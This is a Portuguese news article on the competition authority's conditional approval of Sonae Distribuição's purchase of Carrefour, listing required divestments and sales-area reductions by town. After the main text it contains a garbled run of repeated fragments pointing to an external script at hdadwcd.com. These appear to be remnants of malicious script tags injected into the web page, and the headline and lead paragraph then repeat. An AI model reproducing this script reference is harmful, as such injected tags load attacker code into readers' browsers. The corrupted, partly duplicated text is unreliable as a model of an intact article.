A Autoridade da Concorrência pronunciou-se quanto à sua decisão de não oposição ao processo de compra do Carrefour pela Sonae Distribuição, apesar de haverem algumas condições que esta última terá que cumprir para o negócio avançar.
Actualmente, o Carrefour possui no nosso país 12 supermercados, 8 postos de combustíveis e 13 projectos licenciados (2 deles que já se encontram em construção – Valongo e Famalicão e 11 em portfolio). De acordo com a decisão da AdC, a Sonae Distribuição terá que se comprometer a alienar a um concorrente o projecto de hipermercado com uma área de venda de 6000 m2 e já licenciado em Viana do Castelo. Não caso de não conseguir concretizar o negócio, a empresa não poderá fazer uso da autorização da instalação nos próximos 5 anos.
A AdC impôs ainda para a concretização do negócio, a redução da área de vendas, em funcionamento ou com instalação autorizada para a actividade de retalho alimentar em várias localidades. Assim, em Paços de Ferreira e Penafiel esta redução foi de um total de 2.000 m2, no mercado local; no Grande Porto de um total de 8.600 m2, o que se traduz obrigatoriamente numa diminuição da área de um projecto de hipermercado para o centro do Porto em, pelo menos, 1.500 m2, e de 2.000 m2 num supermercado Modelo em funcionamento em Valongo.
Em Coimbra, a Sonae vai-se ver obrigada a alienar umas de três unidades da zona: o Continente, o Carrefour, ou o Modelo de Coimbra (2.000 m2) juntamente com o projecto para uma unidade alimentar em Condeixa (2.000 m2). No caso de ser a última a opção escolhida, será obrigado a conceder ao(s) comprador(es) uma opção para ocupar igualmente uma área de vendas contígua de 1.000 m2 para cada unidade. Em Portimão a situação é idêntica. Já na margem Sul, o retalhista comprometeu-se a limitar o seu crescimento no mercado local durante os 3 anos após a decisão da AdC, estando impedido, nesse período, de aumentar a sua área de vendas de estabelecimentos de comércio alimentar ou misto, em mais de 14.000 m2 (dum total de 20.500 m2 já licenciados).
A decisão implica ainda por parte da Sonae Distribuição o compromisso de não efectuar pedidos de licença para instalação de lojas alimentares ou para modificação das lojas existentes que implique aumento da área de venda, no ano seguinte à decisão da AdC, na Margem Sul, Paços de Ferreira e Penafiel, Viana do Castelo, Coimbra e Portimão.
Assim, as várias alterações impostas pela Autoridade da Concorrência representam um alienação total de 32 mil m2 de área de venda, dos quais 15 mil m2 deverão ser alienados a concorrentes e cerca de 17 mil m2 reduzidos na área de venda alimentar.ttp://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>
Soane Distribuição compra Carrefour com restrições
A Autoridade da Concorrência pronunciou-se quanto à sua decisão de não oposição ao processo de compra do Carrefour pela Sonae Distribuição, apesar de haverem algumas imposições que deverão ser cumpridas.